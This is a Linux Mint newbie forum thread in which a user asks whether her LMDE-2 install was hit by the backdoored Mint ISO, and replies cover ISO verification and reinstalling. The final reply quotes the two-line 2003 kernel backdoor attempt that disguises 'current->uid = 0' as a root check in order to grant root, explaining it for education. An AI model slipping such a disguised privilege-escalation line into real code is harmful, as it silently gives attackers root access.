LMDE-2 cinnamon bad iso?

All Gurus once were Newbies
Forum rules
There are no such things as "stupid" questions. However if you think your question is a bit stupid, then this is the right place for you to post it. Please stick to easy to-the-point questions that you feel people can answer fast. For long and complicated questions prefer the other forums within the support section.
Before you post please read how to get help

LMDE 2 support ends on 1-1-2019
Post Reply
PattiM
Level 1
Level 1
Posts: 37
Joined: Tue Feb 07, 2012 10:27 pm

LMDE-2 cinnamon bad iso?

Post by PattiM » Sun Apr 16, 2017 10:44 pm

Was there complete resolution on LMDE-2 as to whether or not it was involved with the "backdoor" installed in the Cinnamon Mint ISO file (sometime in the last year or so)? I've read a lot, but unfortunately am not really able to decipher for sure whether the LMDE-2 install I did earlier this year (as guest under VirtualBox) was involved. I don't use Cinnamon, but rather KDE. I've kept all my patches current, but never read anything that said patches would fix the backdoor which was installed...

Thank You Very Much,
Patricia

User avatar
Fred Barclay
Level 12
Level 12
Posts: 4147
Joined: Sat Sep 13, 2014 11:12 am
Location: Bumping around in the bush

Re: LMDE-2 cinnamon bad iso?

Post by Fred Barclay » Sun Apr 16, 2017 11:09 pm

Hi Patricia,
The only version of Mint that was backdoored and distributed was Linux Mint 17.3 Cinnamon 64-bit. We LMDE users were quite safe. :)
However, it is always a good idea to check a Linux iso for integrity when you download it, because these types of events have happened before and will happen again. You don't want to get an evil iso and not realise it. Also, sometimes downloads just go badly and you get a broken iso, which can behave improperly. Integrity checking will catch this and let you know before you install the iso.
Here are some links which may be useful:
https://linuxmint.com/verify.php (official instructions)
viewtopic.php?f=42&t=226092&p=1192608#p1192608 (instructions by a highly knowledgeable member of our community)
https://fred-barclay.github.io/VerifyLinuxMint/

You're right, no patches can be guaranteed to fix a computer with a backdoor.
Image
"Once you can accept the universe as matter expanding into nothing that is something, wearing stripes with plaid comes easy."
- Albert Einstein

User avatar
jimallyn
Level 18
Level 18
Posts: 8419
Joined: Thu Jun 05, 2014 7:34 pm
Location: Wenatchee, WA USA

Re: LMDE-2 cinnamon bad iso?

Post by jimallyn » Sun Apr 16, 2017 11:33 pm

Fred Barclay wrote:The only version of Mint that was backdoored and distributed was Linux Mint 17.3 Cinnamon 64-bit.
And that was only up for a few hours on one day.
Image

“If the government were coming for your TVs and cars, then you'd be upset. But, as it is, they're only coming for your sons.” - Daniel Berrigan

PattiM
Level 1
Level 1
Posts: 37
Joined: Tue Feb 07, 2012 10:27 pm

Re: LMDE-2 cinnamon bad iso?

Post by PattiM » Mon Apr 17, 2017 8:43 pm

Thank you very much for the replies. What made me ask was that I did notice that on... https://haveibeenpwned.com/ ...it listed both the Facebook and the Linux Mint hacks as references for my pwned email. I don't know how much information that site obtains, or how, but it made me think. So I thought I would ask.

Best,
Patricia

PS: Where are "backdoors" installed usually (e.g., in the kernel code?)? Is a reinstall (with format of the system drive) a fix, or must the /home partition also be formatted? Now that I think about that, I'm sure the answer is, "it depends..."

User avatar
Fred Barclay
Level 12
Level 12
Posts: 4147
Joined: Sat Sep 13, 2014 11:12 am
Location: Bumping around in the bush

Re: LMDE-2 cinnamon bad iso?

Post by Fred Barclay » Tue Apr 18, 2017 12:33 am

PattiM wrote: Now that I think about that, I'm sure the answer is, "it depends..."
Precisely. :)
It all depends on the backdoor author, how long a malicious actor has been present on the system, and what steps (if any) have been taken by that actor after gaining backdoor access, plus a whole bunch of other factors. The safest step is to nuke the entire system.
Even determining how long the attacker has had access to your system can be challenging. A lot of events in Linux are "logged", i.e they're written into some text files in your /var/log directory, and you can go back and read these logs to see what's been going on. Many things that the attacker might do would be logged.
But our hypothetical attacker isn't stupid and he knows about these logs... so he edits them to remove evidence of his activity. Now you're left with gaps in your logs that you might not notice, or you might notice but think are due to lack of system activity. And these log files tend to pile up so unless you have previous experience reading log files you're highly unlikely to figure out what's going on.
Long story short... even determining how long a malicious actor has been present can be challenging. And if you can't figure out how long he/she has been there, imagine the difficulty of figuring out what he/she has done to your system!

So yeah... nuking the computer and starting over is usually the safest step. ;)
Where are "backdoors" installed usually (e.g., in the kernel code?)?
This also depends.
The Mint backdoor was installed as /var/lib/man.cy, which is not part of the kernel. It was written in C and was 926 lines long. It was also an extremely sloppy backdoor (to the backdoor author: feel free to take offence. :mrgreen: )
Other backdoors could be in other locations. For instance, there was an attempt in 2003 to sneak a backdoor into the Linux kernel itself. The only change was adding these two lines:

Code: Select all

if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
        retval = -EINVAL;
into part of the kernel code. It's a rather clever backdoor because it looks as if it's just checking if the current process or user is root, but it's actually giving the current user root permissions:
current->uid == 0 check for root... what the backdoor author wanted the kernel devs to think was happening
current->uid = 0 set the user id ("uid") as root... what was really happening.
A single "=" mark can make a lot of difference!

But enough rambling on my part. Backdoors can be installed almost anywhere, but the good news is that writing a "good" backdoor is beyond the skill of many attackers. Even better news? You're running Linux... one of the strongest and best operating systems out there!

Cheers!
Image
"Once you can accept the universe as matter expanding into nothing that is something, wearing stripes with plaid comes easy."
- Albert Einstein

Post Reply

Return to “Newbie Questions”